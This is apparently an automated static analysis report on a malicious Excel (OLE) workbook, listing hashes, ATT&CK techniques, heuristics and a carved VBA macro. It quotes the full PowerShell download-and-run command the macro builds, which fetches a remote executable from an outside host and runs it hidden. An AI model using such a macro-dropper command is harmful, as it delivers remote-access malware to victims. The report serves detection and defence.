Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 9927a67f3e7ad9c7…

MALICIOUS

Office (OLE) / .XLS

73.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel
MD5: 44b9c0a965d95d0b6b2f807545069291 SHA-1: 061990b72fab8c7b7ec0df8d2d3b67f219df36b2 SHA-256: 9927a67f3e7ad9c702ed5bfb3c3af153c00dfaf6e1c5522e10a74b636037a063
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The Workbook_Open macro executes a command that writes a PowerShell command to a temporary file, 'C:\Users\Public\Documents\institutionsport.cmd'. This command then downloads 'AnyDesk.exe' from 'http://thepunchlineexpose.com/Manager/AnyDesk.exe' and saves it as 'C:\Users\Public\Documents\weekshe.exe'. The macro then executes this downloaded file. The PowerShell command constructed is: 'powershell -w hi sleep -Se 31;Start-BitsTransfer -Source http://thepunchlineexpose.com/Manager/AnyDesk.exe -Destination C:\Users\Public\Documents\weekshe.exe;C:\Users\Public\Documents\weekshe.exe'.

Heuristics 5

  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
d5387914e198af7231991211bf5d0f562a3477459899e11bf62650de3f4f0162
vba-macro oletools.olevba.extract_macros (decoded VBA source) 1170 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.